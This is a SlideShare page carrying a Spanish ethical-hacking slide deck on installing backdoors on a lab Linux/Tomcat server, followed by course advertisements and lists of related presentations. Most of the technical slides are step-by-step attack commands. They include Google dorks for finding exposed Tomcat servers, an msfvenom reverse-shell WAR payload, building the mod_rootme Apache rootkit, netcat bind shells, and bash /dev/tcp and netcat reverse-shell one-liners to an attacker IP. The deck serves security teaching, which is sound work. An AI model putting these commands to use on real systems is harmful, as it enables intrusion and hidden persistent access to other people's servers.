SlideShare una empresa de Scribd logo
1 de 25
AGENDA 1. ¿Quién soy?
2. Buscando vulnerabilidades backdoors
3. ¿Qué es un backdoor?
1. Backdoor SETUID
2. Backdoor Módulo de APACHE
3. Backdoor Bind Shell
4. Backdoor Reverse Shell
5. Backdoor KnockOut
4. Instalando y configurando backdoors (ejemplos)
5. Información sobre el curso
6. Conclusiones
AGENDA 1. ¿Quién soy?
2. Buscando vulnerabilidades backdoors
3. ¿Qué es un backdoor?
1. Backdoor SETUID
2. Backdoor Módulo de APACHE
3. Backdoor Bind Shell
4. Backdoor Reverse Shell
5. Backdoor KnockOut
4. Instalando y configurando backdoors (ejemplos)
5. Información sobre el curso
6. Conclusiones
#whoami
• Ing. Sistemas – ISO 27001 Lead Auditor, CISM, C|EH,
C)PTE, C)SWAE, C)PEH, ITILv3, C)ISSO, ISO 27002
• Instructor Oficial de MILE2
• Consultor de Kunak Consulting SAC
http://www.kunak.com.pe
• Psicólogo que aun no comienza sus estudios….
• Escritor en mis tiempos libres:
http://www.el-palomo.com
• Correo electrónico:
• omarc320@gmail.com
• opalomino@kunak.com.pe
• Cuenta de Facebook:
• www.facebook.com/El.Palomo.Seguridad.Informacion
AGENDA 1. ¿Quién soy?
2. ¿Qué es un backdoor?
1. Backdoor SETUID
2. Backdoor Módulo de APACHE
3. Backdoor Bind Shell
4. Backdoor Reverse Shell
5. Backdoor KnockOut
3. Instalando y configurando backdoors (ejemplos)
4. Información sobre el curso
5. Conclusiones
¿Qué es un Backdoor (puerta trasera)?
• Los backdoors son programas utilizados
por los hackers para lograr acceso a
sistemas operativos de manera rápida y
sencilla.
• Existen diferentes tipos de backdoors:
• Backdoors en Aplicaciones Web
• Backdoors a través de SETUID
• Backdoors en Módulos de Servicios
• Backdoors del tipo Knocking
Arquitectura de los Ejemplos
TARGET
- Servidor TOMCAT vulnerable
- Aquí se instalaran los backdoors
- Sistema Operativo Linux
ATACANTE
- Computador desde el cual se
realizarán los ataques
- Sistema Operativo KALI LINUX 2
ATACANTE 2
- Computador desde el cual se
explotaran los backdoors
- Sistema Operativo Linux
Dirección IP: 192.168.4.131
Dirección IP: 192.168.4.130
Dirección IP: 192.168.4.132
Identificar Servicios TOMCAT
• Buscamos TOMCAT en la RED LAN a
través de NMAP
Nmap –sV –p 8080 –sS TARGET
auxiliary/scanner/portscan/syn
Buscamos TOMCAT/AXIS2 en INTERNET:
Google Dork:
intitle:"Tomcat Server Administration“
intitle:"Axis2 Happiness Page" +ext:jsp
Ahora si …. Vamos con los ejemplos
Identificar Vulnerabilidades en TOMCAT
• Vamos a utilizar METASPLOIT para identificar
vulnerabilidades:
Root> msfconsole
Root> search tomcat
Root> use auxiliary/scanner/http/tomcat_mgr_login
Root> show options
Root> set RHOSTS 192.168.4.130
Finalmente realizar la carga de un .WAR malicioso para
obtener acceso al sistema operativo.
msfvenom -p java/meterpreter/reverse_tcp
LHOST=192.168.4.131 -f war > meterpreter.war
En el cliente:
Msf> use exploit/multi/handler
Msf> set payload java/meterpreter/reverse_tcp
Backdoor con SETUID
• De pronto algunos nunca escucharon de los
permisos GETUID, SETUID y STICKY. Pues este
mecanismo de backdoor está asociado a SETUID.
¿Entonces en que consiste el SETUID?
El SETUID es un bit que permite a las aplicaciones
ejecutarse con los permisos de su propietario. El
concepto puede sonar muy abstracto pero si ponemos
un ejemplo es más facil entender, vamos a crear un
archivo llamado TEST.C y lo compilamos.
Backdoor con SETUID
Backdoor en Apache Server
• Cargamos un módulo en APACHE de tal
manera que no se realicen cambios a nivel de
código en los aplicativos PHP.
• ¿Cuántos administradores de Sistemas
verifican los módulos cargados en Apache?
• Toca compilar un módulo de APACHE llamado
ModROOTme.
https://github.com/jingchunzhang/backdoor_rootkit/
tree/master/mod_rootme-0.4
Backdoor en Apache Server
• Comandos en el Sistema Operativo
root>cd mod_rootme-0.4/
root>Make Linux
root> cp mod_rootme2.so /etc/httpd/modules
root> /etc/init.d/httpd reload
En el cliente:
Root> nc 192.168.4.130 80
GET root
Backdoor: BindShell
• Las primeras herramientas utilizados por
Hackers fue la navaja suiza “NETCAT”.
• Una BindShell es un programa
corriendo una SHELL dentro de un
proceso de red.
• Una BindShell puede estar escrita en
cualquier lenguaje de programación.
http://netcat.sourceforge.net/download.php
Backdoor: Bind Shell
• Comandos en el sistema operativo:
root>./configure --enable-
DGAPING_SECURITY_HOLE
root>Make
root> cd src/
root> ./netcat -l -p 8443 -e /bin/sh
root> bg
En el CLIENTE:
C:>nc64.exe 192.168.75.133 8443
Backdoor: Reverse Shell
• Tiene el mismo concepto que una
Bind Shell pero realizada de manera
reversa.
• Ahora es el servidor quien se
conecta a nuestro cliente. Esta
pensado para poder realizar
bypass de Firewalls.
Backdoor: Reverse Shell
• Reverse Shell con BASH
En el cliente:
nc64.exe -l -p 8080 -vvv
En el servidor:
bash -i >& /dev/tcp/192.168.1.34/8080 0>&1
Backdoor: Reverse Shell
• Reverse Shell con NETCAT
En el cliente:
nc64.exe -l -p 8080 -vvv
En el servidor:
./netcat -e /bin/sh 192.168.1.34 8080
Backdoor: KnockOut
• Knock viene del ingles tocar la
puerta.
• Este es un backdoor del tipo
“Reverse Shell” que pasa
desapercibido.
• Sólo puede ser accedido por aquel
que conozca la combinación de la
“puerta” correcta.
Backdoor: KnockOut
• En el servidor:
• Root> $make servidor
• Root> ./knock-outd knock-out.conf eth5
• En el cliente (atacante):
• Root> $make cliente
• Root> ./knock-outc 192.168.4.130 knock-out.conf
• Root> ./netcat -lv -p 64876
AGENDA 1. ¿Quién soy?
2. ¿Qué es un backdoor?
1. Backdoor SETUID
2. Backdoor Módulo de APACHE
3. Backdoor Bind Shell
4. Backdoor Reverse Shell
5. Backdoor KnockOut
3. Instalando y configurando backdoors (ejemplos)
4. Información sobre el curso
5. Conclusiones
Curso de Ethical Hacking
https://www.facebook.com/sistemasuni/
Lugar: Universidad Nacional de
Ingeniería (UNI) – Lima – Perú
Duración: 24 horas – Curso Básico
24 horas – Curso Avanzado
Certificado: A nombre de la Universidad
Nacional de Ingeniería (UNI)
Próximo Inicio: Inicios Recurrentes
Curso de Seguridad de Información
http://www.kunak.com.pe
Lugar: Miraflores – Lima – Perú
Duración: 60 horas
Certificado: A nombre Kunak
Consulting SAC
Próximo Inicio: Por definir
Backdoors: Tipos y Ejemplos Prácticos

Más contenido relacionado

La actualidad más candente

Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]
Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]
Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]RootedCON
 
Seguridad en WordPress, fundamentos y mejores prácticas
Seguridad en WordPress, fundamentos y mejores prácticasSeguridad en WordPress, fundamentos y mejores prácticas
Seguridad en WordPress, fundamentos y mejores prácticasLucy Tomas
 
Taller de seguridad para servidores GNU/Linux (GSICKMinds)
Taller de seguridad para servidores GNU/Linux (GSICKMinds)Taller de seguridad para servidores GNU/Linux (GSICKMinds)
Taller de seguridad para servidores GNU/Linux (GSICKMinds)cl0p3z
 
Tecnicas avanzadas de penetracion a sistemas con ids
Tecnicas avanzadas de penetracion a sistemas con idsTecnicas avanzadas de penetracion a sistemas con ids
Tecnicas avanzadas de penetracion a sistemas con idsn3xasec
 
José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]
José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]
José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]RootedCON
 
Evasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamar
Evasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamarEvasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamar
Evasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamarINCIDE
 
Instalar siberian cms (hestia cp) en aws
Instalar siberian cms (hestia cp) en awsInstalar siberian cms (hestia cp) en aws
Instalar siberian cms (hestia cp) en awsMizaelMartinez2
 
Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]
Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]
Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]RootedCON
 
Entorno de desarrollo rápido con Vagrant
Entorno de desarrollo rápido con VagrantEntorno de desarrollo rápido con Vagrant
Entorno de desarrollo rápido con VagrantPau Ferrer Ocaña
 
David Meléndez Cano - Trash Robotic Router Platform (TRRP) [Rooted CON 2013]
David Meléndez Cano - Trash Robotic Router Platform (TRRP) [Rooted CON 2013]David Meléndez Cano - Trash Robotic Router Platform (TRRP) [Rooted CON 2013]
David Meléndez Cano - Trash Robotic Router Platform (TRRP) [Rooted CON 2013]RootedCON
 
Seguridad en WordPress
Seguridad en WordPressSeguridad en WordPress
Seguridad en WordPressPedro Santos
 
Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
Mariano Palomo  - Taller de reversing en sistemas Windows aplicado a CTFs [ro...Mariano Palomo  - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...RootedCON
 
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRootedCON
 
Seguridad en Asterisk: Un acercamiento detallado
Seguridad en Asterisk: Un acercamiento detalladoSeguridad en Asterisk: Un acercamiento detallado
Seguridad en Asterisk: Un acercamiento detalladoPaloSanto Solutions
 
Hugo Teso - Inguma 0.5 Red Wagon [Rooted CON 2012]
Hugo Teso - Inguma 0.5 Red Wagon [Rooted CON 2012]Hugo Teso - Inguma 0.5 Red Wagon [Rooted CON 2012]
Hugo Teso - Inguma 0.5 Red Wagon [Rooted CON 2012]RootedCON
 

La actualidad más candente (20)

Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]
Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]
Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]
 
Seguridad en WordPress, fundamentos y mejores prácticas
Seguridad en WordPress, fundamentos y mejores prácticasSeguridad en WordPress, fundamentos y mejores prácticas
Seguridad en WordPress, fundamentos y mejores prácticas
 
Taller de seguridad para servidores GNU/Linux (GSICKMinds)
Taller de seguridad para servidores GNU/Linux (GSICKMinds)Taller de seguridad para servidores GNU/Linux (GSICKMinds)
Taller de seguridad para servidores GNU/Linux (GSICKMinds)
 
Tecnicas avanzadas de penetracion a sistemas con ids
Tecnicas avanzadas de penetracion a sistemas con idsTecnicas avanzadas de penetracion a sistemas con ids
Tecnicas avanzadas de penetracion a sistemas con ids
 
Reventando WordPress
Reventando WordPressReventando WordPress
Reventando WordPress
 
José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]
José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]
José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]
 
Backtrack 5 manual traducido
Backtrack 5 manual traducidoBacktrack 5 manual traducido
Backtrack 5 manual traducido
 
Evasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamar
Evasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamarEvasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamar
Evasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamar
 
Instalar siberian cms (hestia cp) en aws
Instalar siberian cms (hestia cp) en awsInstalar siberian cms (hestia cp) en aws
Instalar siberian cms (hestia cp) en aws
 
Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]
Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]
Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]
 
Entorno de desarrollo rápido con Vagrant
Entorno de desarrollo rápido con VagrantEntorno de desarrollo rápido con Vagrant
Entorno de desarrollo rápido con Vagrant
 
Kali linux guia español
Kali linux guia españolKali linux guia español
Kali linux guia español
 
David Meléndez Cano - Trash Robotic Router Platform (TRRP) [Rooted CON 2013]
David Meléndez Cano - Trash Robotic Router Platform (TRRP) [Rooted CON 2013]David Meléndez Cano - Trash Robotic Router Platform (TRRP) [Rooted CON 2013]
David Meléndez Cano - Trash Robotic Router Platform (TRRP) [Rooted CON 2013]
 
Seguridad en WordPress
Seguridad en WordPressSeguridad en WordPress
Seguridad en WordPress
 
Recopilación de Penetration Test Backtrack
Recopilación  de Penetration Test BacktrackRecopilación  de Penetration Test Backtrack
Recopilación de Penetration Test Backtrack
 
Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
Mariano Palomo  - Taller de reversing en sistemas Windows aplicado a CTFs [ro...Mariano Palomo  - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
 
Metasploit
MetasploitMetasploit
Metasploit
 
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
 
Seguridad en Asterisk: Un acercamiento detallado
Seguridad en Asterisk: Un acercamiento detalladoSeguridad en Asterisk: Un acercamiento detallado
Seguridad en Asterisk: Un acercamiento detallado
 
Hugo Teso - Inguma 0.5 Red Wagon [Rooted CON 2012]
Hugo Teso - Inguma 0.5 Red Wagon [Rooted CON 2012]Hugo Teso - Inguma 0.5 Red Wagon [Rooted CON 2012]
Hugo Teso - Inguma 0.5 Red Wagon [Rooted CON 2012]
 

Similar a Backdoors: Tipos y Ejemplos Prácticos

Scripting para Pentesters v1.0
Scripting para Pentesters v1.0Scripting para Pentesters v1.0
Scripting para Pentesters v1.0wcuestas
 
Instalacion y configuracion de squid 2.6 estable
Instalacion y configuracion de squid 2.6 estableInstalacion y configuracion de squid 2.6 estable
Instalacion y configuracion de squid 2.6 estableBartOc3
 
Maitaining access
Maitaining accessMaitaining access
Maitaining accessTensor
 
Clusters Beowulf
Clusters BeowulfClusters Beowulf
Clusters Beowulfsrcid
 
MAITAINING ACCESS
MAITAINING ACCESSMAITAINING ACCESS
MAITAINING ACCESSTensor
 
Backtrack 5 manual traducido
Backtrack 5 manual traducido Backtrack 5 manual traducido
Backtrack 5 manual traducido Millward Brown
 
Actividad No. 5.5: Aseguramiento de servidores GNU/Linux
Actividad No. 5.5: Aseguramiento de servidores GNU/LinuxActividad No. 5.5: Aseguramiento de servidores GNU/Linux
Actividad No. 5.5: Aseguramiento de servidores GNU/LinuxFrancisco Medina
 
Multi relay
Multi relayMulti relay
Multi relayjselvi
 
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]RootedCON
 
Extendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con SnortExtendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con SnortJuan Oliva
 
Detectando DDoS e intrusiones con RouterOS
Detectando DDoS e intrusiones con RouterOSDetectando DDoS e intrusiones con RouterOS
Detectando DDoS e intrusiones con RouterOSPavel Odintsov
 
Backtrack 5 manual traducido
Backtrack 5 manual traducidoBacktrack 5 manual traducido
Backtrack 5 manual traducidossuser8f1d221
 
Policyd: Instalacion y configuracion
Policyd: Instalacion y configuracionPolicyd: Instalacion y configuracion
Policyd: Instalacion y configuracioncriscega
 
Actividad4 manual usuarrio _victor jaimes
Actividad4 manual usuarrio _victor jaimesActividad4 manual usuarrio _victor jaimes
Actividad4 manual usuarrio _victor jaimesVictor Jaimes
 
Actividad No. 6.6: Detección de intrusos con Snort
Actividad No. 6.6: Detección de intrusos con SnortActividad No. 6.6: Detección de intrusos con Snort
Actividad No. 6.6: Detección de intrusos con SnortFrancisco Medina
 

Similar a Backdoors: Tipos y Ejemplos Prácticos (20)

Entorno PHP
Entorno PHPEntorno PHP
Entorno PHP
 
Scripting para Pentesters v1.0
Scripting para Pentesters v1.0Scripting para Pentesters v1.0
Scripting para Pentesters v1.0
 
Instalacion y configuracion de squid 2.6 estable
Instalacion y configuracion de squid 2.6 estableInstalacion y configuracion de squid 2.6 estable
Instalacion y configuracion de squid 2.6 estable
 
Docker y PostgreSQL
Docker y PostgreSQLDocker y PostgreSQL
Docker y PostgreSQL
 
Maitaining access
Maitaining accessMaitaining access
Maitaining access
 
PDIDTI-S7.pptx
PDIDTI-S7.pptxPDIDTI-S7.pptx
PDIDTI-S7.pptx
 
Clusters Beowulf
Clusters BeowulfClusters Beowulf
Clusters Beowulf
 
MAITAINING ACCESS
MAITAINING ACCESSMAITAINING ACCESS
MAITAINING ACCESS
 
Backtrack 5 manual traducido
Backtrack 5 manual traducido Backtrack 5 manual traducido
Backtrack 5 manual traducido
 
Actividad No. 5.5: Aseguramiento de servidores GNU/Linux
Actividad No. 5.5: Aseguramiento de servidores GNU/LinuxActividad No. 5.5: Aseguramiento de servidores GNU/Linux
Actividad No. 5.5: Aseguramiento de servidores GNU/Linux
 
Multi relay
Multi relayMulti relay
Multi relay
 
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
 
Extendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con SnortExtendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con Snort
 
Detectando DDoS e intrusiones con RouterOS
Detectando DDoS e intrusiones con RouterOSDetectando DDoS e intrusiones con RouterOS
Detectando DDoS e intrusiones con RouterOS
 
Bulma 441
Bulma 441Bulma 441
Bulma 441
 
Backtrack 5 manual traducido
Backtrack 5 manual traducidoBacktrack 5 manual traducido
Backtrack 5 manual traducido
 
Gestión Remota de Equipos con Python
Gestión Remota de Equipos con PythonGestión Remota de Equipos con Python
Gestión Remota de Equipos con Python
 
Policyd: Instalacion y configuracion
Policyd: Instalacion y configuracionPolicyd: Instalacion y configuracion
Policyd: Instalacion y configuracion
 
Actividad4 manual usuarrio _victor jaimes
Actividad4 manual usuarrio _victor jaimesActividad4 manual usuarrio _victor jaimes
Actividad4 manual usuarrio _victor jaimes
 
Actividad No. 6.6: Detección de intrusos con Snort
Actividad No. 6.6: Detección de intrusos con SnortActividad No. 6.6: Detección de intrusos con Snort
Actividad No. 6.6: Detección de intrusos con Snort
 

Más de Hacking Bolivia (20)

csi pdf2022.pdf
csi pdf2022.pdfcsi pdf2022.pdf
csi pdf2022.pdf
 
ciifBO.pdf
ciifBO.pdfciifBO.pdf
ciifBO.pdf
 
Cistrip.pdf
Cistrip.pdfCistrip.pdf
Cistrip.pdf
 
ciifBO.pdf
ciifBO.pdfciifBO.pdf
ciifBO.pdf
 
hackinbo.pdf
hackinbo.pdfhackinbo.pdf
hackinbo.pdf
 
csi bo 2022.pdf
csi bo 2022.pdfcsi bo 2022.pdf
csi bo 2022.pdf
 
Bajo Ataque 2.pptx
Bajo Ataque 2.pptxBajo Ataque 2.pptx
Bajo Ataque 2.pptx
 
Cveif2020 1
Cveif2020 1Cveif2020 1
Cveif2020 1
 
Calificaciones EEH2020
Calificaciones EEH2020Calificaciones EEH2020
Calificaciones EEH2020
 
CSI 2019 NOTAS
CSI 2019 NOTASCSI 2019 NOTAS
CSI 2019 NOTAS
 
Pre Shenlong
Pre ShenlongPre Shenlong
Pre Shenlong
 
Calificaciones del ESRI 2019
Calificaciones del ESRI 2019Calificaciones del ESRI 2019
Calificaciones del ESRI 2019
 
Csi 2017 cbba
Csi 2017 cbbaCsi 2017 cbba
Csi 2017 cbba
 
CSI 2017 LP
CSI 2017 LPCSI 2017 LP
CSI 2017 LP
 
Lista de participantes VII CIIFHE
Lista de participantes VII CIIFHELista de participantes VII CIIFHE
Lista de participantes VII CIIFHE
 
Csi 2017 scz
Csi 2017 sczCsi 2017 scz
Csi 2017 scz
 
Riesgos del Internet de las Cosas
Riesgos del Internet de las CosasRiesgos del Internet de las Cosas
Riesgos del Internet de las Cosas
 
Analisis de ataques desarrollador por IOT
Analisis de ataques desarrollador por IOTAnalisis de ataques desarrollador por IOT
Analisis de ataques desarrollador por IOT
 
Pusheen pre adopcion
Pusheen pre adopcionPusheen pre adopcion
Pusheen pre adopcion
 
Acredita tu conocimiento
Acredita tu conocimientoAcredita tu conocimiento
Acredita tu conocimiento
 

Último

RETO MES DE ABRIL .............................docx
RETO MES DE ABRIL .............................docxRETO MES DE ABRIL .............................docx
RETO MES DE ABRIL .............................docxAna Fernandez
 
codigos HTML para blogs y paginas web Karina
codigos HTML para blogs y paginas web Karinacodigos HTML para blogs y paginas web Karina
codigos HTML para blogs y paginas web Karinavergarakarina022
 
DE LAS OLIMPIADAS GRIEGAS A LAS DEL MUNDO MODERNO.ppt
DE LAS OLIMPIADAS GRIEGAS A LAS DEL MUNDO MODERNO.pptDE LAS OLIMPIADAS GRIEGAS A LAS DEL MUNDO MODERNO.ppt
DE LAS OLIMPIADAS GRIEGAS A LAS DEL MUNDO MODERNO.pptELENA GALLARDO PAÚLS
 
RAIZ CUADRADA Y CUBICA PARA NIÑOS DE PRIMARIA
RAIZ CUADRADA Y CUBICA PARA NIÑOS DE PRIMARIARAIZ CUADRADA Y CUBICA PARA NIÑOS DE PRIMARIA
RAIZ CUADRADA Y CUBICA PARA NIÑOS DE PRIMARIACarlos Campaña Montenegro
 
LINEAMIENTOS INICIO DEL AÑO LECTIVO 2024-2025.pptx
LINEAMIENTOS INICIO DEL AÑO LECTIVO 2024-2025.pptxLINEAMIENTOS INICIO DEL AÑO LECTIVO 2024-2025.pptx
LINEAMIENTOS INICIO DEL AÑO LECTIVO 2024-2025.pptxdanalikcruz2000
 
LA ECUACIÓN DEL NÚMERO PI EN LOS JUEGOS OLÍMPICOS DE PARÍS. Por JAVIER SOLIS ...
LA ECUACIÓN DEL NÚMERO PI EN LOS JUEGOS OLÍMPICOS DE PARÍS. Por JAVIER SOLIS ...LA ECUACIÓN DEL NÚMERO PI EN LOS JUEGOS OLÍMPICOS DE PARÍS. Por JAVIER SOLIS ...
LA ECUACIÓN DEL NÚMERO PI EN LOS JUEGOS OLÍMPICOS DE PARÍS. Por JAVIER SOLIS ...JAVIER SOLIS NOYOLA
 
Planificacion Anual 2do Grado Educacion Primaria 2024 Ccesa007.pdf
Planificacion Anual 2do Grado Educacion Primaria   2024   Ccesa007.pdfPlanificacion Anual 2do Grado Educacion Primaria   2024   Ccesa007.pdf
Planificacion Anual 2do Grado Educacion Primaria 2024 Ccesa007.pdfDemetrio Ccesa Rayme
 
30-de-abril-plebiscito-1902_240420_104511.pdf
30-de-abril-plebiscito-1902_240420_104511.pdf30-de-abril-plebiscito-1902_240420_104511.pdf
30-de-abril-plebiscito-1902_240420_104511.pdfgimenanahuel
 
Factores ecosistemas: interacciones, energia y dinamica
Factores ecosistemas: interacciones, energia y dinamicaFactores ecosistemas: interacciones, energia y dinamica
Factores ecosistemas: interacciones, energia y dinamicaFlor Idalia Espinoza Ortega
 
2024 - Expo Visibles - Visibilidad Lesbica.pdf
2024 - Expo Visibles - Visibilidad Lesbica.pdf2024 - Expo Visibles - Visibilidad Lesbica.pdf
2024 - Expo Visibles - Visibilidad Lesbica.pdfBaker Publishing Company
 
la unidad de s sesion edussssssssssssssscacio fisca
la unidad de s sesion edussssssssssssssscacio fiscala unidad de s sesion edussssssssssssssscacio fisca
la unidad de s sesion edussssssssssssssscacio fiscaeliseo91
 
NARRACIONES SOBRE LA VIDA DEL GENERAL ELOY ALFARO
NARRACIONES SOBRE LA VIDA DEL GENERAL ELOY ALFARONARRACIONES SOBRE LA VIDA DEL GENERAL ELOY ALFARO
NARRACIONES SOBRE LA VIDA DEL GENERAL ELOY ALFAROJosé Luis Palma
 
Informatica Generalidades - Conceptos Básicos
Informatica Generalidades - Conceptos BásicosInformatica Generalidades - Conceptos Básicos
Informatica Generalidades - Conceptos BásicosCesarFernandez937857
 
Lecciones 04 Esc. Sabática. Defendamos la verdad
Lecciones 04 Esc. Sabática. Defendamos la verdadLecciones 04 Esc. Sabática. Defendamos la verdad
Lecciones 04 Esc. Sabática. Defendamos la verdadAlejandrino Halire Ccahuana
 
cortes de luz abril 2024 en la provincia de tungurahua
cortes de luz abril 2024 en la provincia de tungurahuacortes de luz abril 2024 en la provincia de tungurahua
cortes de luz abril 2024 en la provincia de tungurahuaDANNYISAACCARVAJALGA
 
Heinsohn Privacidad y Ciberseguridad para el sector educativo
Heinsohn Privacidad y Ciberseguridad para el sector educativoHeinsohn Privacidad y Ciberseguridad para el sector educativo
Heinsohn Privacidad y Ciberseguridad para el sector educativoFundación YOD YOD
 
Plan Refuerzo Escolar 2024 para estudiantes con necesidades de Aprendizaje en...
Plan Refuerzo Escolar 2024 para estudiantes con necesidades de Aprendizaje en...Plan Refuerzo Escolar 2024 para estudiantes con necesidades de Aprendizaje en...
Plan Refuerzo Escolar 2024 para estudiantes con necesidades de Aprendizaje en...Carlos Muñoz
 
GLOSAS Y PALABRAS ACTO 2 DE ABRIL 2024.docx
GLOSAS  Y PALABRAS ACTO 2 DE ABRIL 2024.docxGLOSAS  Y PALABRAS ACTO 2 DE ABRIL 2024.docx
GLOSAS Y PALABRAS ACTO 2 DE ABRIL 2024.docxAleParedes11
 

Último (20)

RETO MES DE ABRIL .............................docx
RETO MES DE ABRIL .............................docxRETO MES DE ABRIL .............................docx
RETO MES DE ABRIL .............................docx
 
codigos HTML para blogs y paginas web Karina
codigos HTML para blogs y paginas web Karinacodigos HTML para blogs y paginas web Karina
codigos HTML para blogs y paginas web Karina
 
DE LAS OLIMPIADAS GRIEGAS A LAS DEL MUNDO MODERNO.ppt
DE LAS OLIMPIADAS GRIEGAS A LAS DEL MUNDO MODERNO.pptDE LAS OLIMPIADAS GRIEGAS A LAS DEL MUNDO MODERNO.ppt
DE LAS OLIMPIADAS GRIEGAS A LAS DEL MUNDO MODERNO.ppt
 
RAIZ CUADRADA Y CUBICA PARA NIÑOS DE PRIMARIA
RAIZ CUADRADA Y CUBICA PARA NIÑOS DE PRIMARIARAIZ CUADRADA Y CUBICA PARA NIÑOS DE PRIMARIA
RAIZ CUADRADA Y CUBICA PARA NIÑOS DE PRIMARIA
 
LINEAMIENTOS INICIO DEL AÑO LECTIVO 2024-2025.pptx
LINEAMIENTOS INICIO DEL AÑO LECTIVO 2024-2025.pptxLINEAMIENTOS INICIO DEL AÑO LECTIVO 2024-2025.pptx
LINEAMIENTOS INICIO DEL AÑO LECTIVO 2024-2025.pptx
 
LA ECUACIÓN DEL NÚMERO PI EN LOS JUEGOS OLÍMPICOS DE PARÍS. Por JAVIER SOLIS ...
LA ECUACIÓN DEL NÚMERO PI EN LOS JUEGOS OLÍMPICOS DE PARÍS. Por JAVIER SOLIS ...LA ECUACIÓN DEL NÚMERO PI EN LOS JUEGOS OLÍMPICOS DE PARÍS. Por JAVIER SOLIS ...
LA ECUACIÓN DEL NÚMERO PI EN LOS JUEGOS OLÍMPICOS DE PARÍS. Por JAVIER SOLIS ...
 
Planificacion Anual 2do Grado Educacion Primaria 2024 Ccesa007.pdf
Planificacion Anual 2do Grado Educacion Primaria   2024   Ccesa007.pdfPlanificacion Anual 2do Grado Educacion Primaria   2024   Ccesa007.pdf
Planificacion Anual 2do Grado Educacion Primaria 2024 Ccesa007.pdf
 
30-de-abril-plebiscito-1902_240420_104511.pdf
30-de-abril-plebiscito-1902_240420_104511.pdf30-de-abril-plebiscito-1902_240420_104511.pdf
30-de-abril-plebiscito-1902_240420_104511.pdf
 
Sesión de clase: Defendamos la verdad.pdf
Sesión de clase: Defendamos la verdad.pdfSesión de clase: Defendamos la verdad.pdf
Sesión de clase: Defendamos la verdad.pdf
 
Factores ecosistemas: interacciones, energia y dinamica
Factores ecosistemas: interacciones, energia y dinamicaFactores ecosistemas: interacciones, energia y dinamica
Factores ecosistemas: interacciones, energia y dinamica
 
2024 - Expo Visibles - Visibilidad Lesbica.pdf
2024 - Expo Visibles - Visibilidad Lesbica.pdf2024 - Expo Visibles - Visibilidad Lesbica.pdf
2024 - Expo Visibles - Visibilidad Lesbica.pdf
 
Repaso Pruebas CRECE PR 2024. Ciencia General
Repaso Pruebas CRECE PR 2024. Ciencia GeneralRepaso Pruebas CRECE PR 2024. Ciencia General
Repaso Pruebas CRECE PR 2024. Ciencia General
 
la unidad de s sesion edussssssssssssssscacio fisca
la unidad de s sesion edussssssssssssssscacio fiscala unidad de s sesion edussssssssssssssscacio fisca
la unidad de s sesion edussssssssssssssscacio fisca
 
NARRACIONES SOBRE LA VIDA DEL GENERAL ELOY ALFARO
NARRACIONES SOBRE LA VIDA DEL GENERAL ELOY ALFARONARRACIONES SOBRE LA VIDA DEL GENERAL ELOY ALFARO
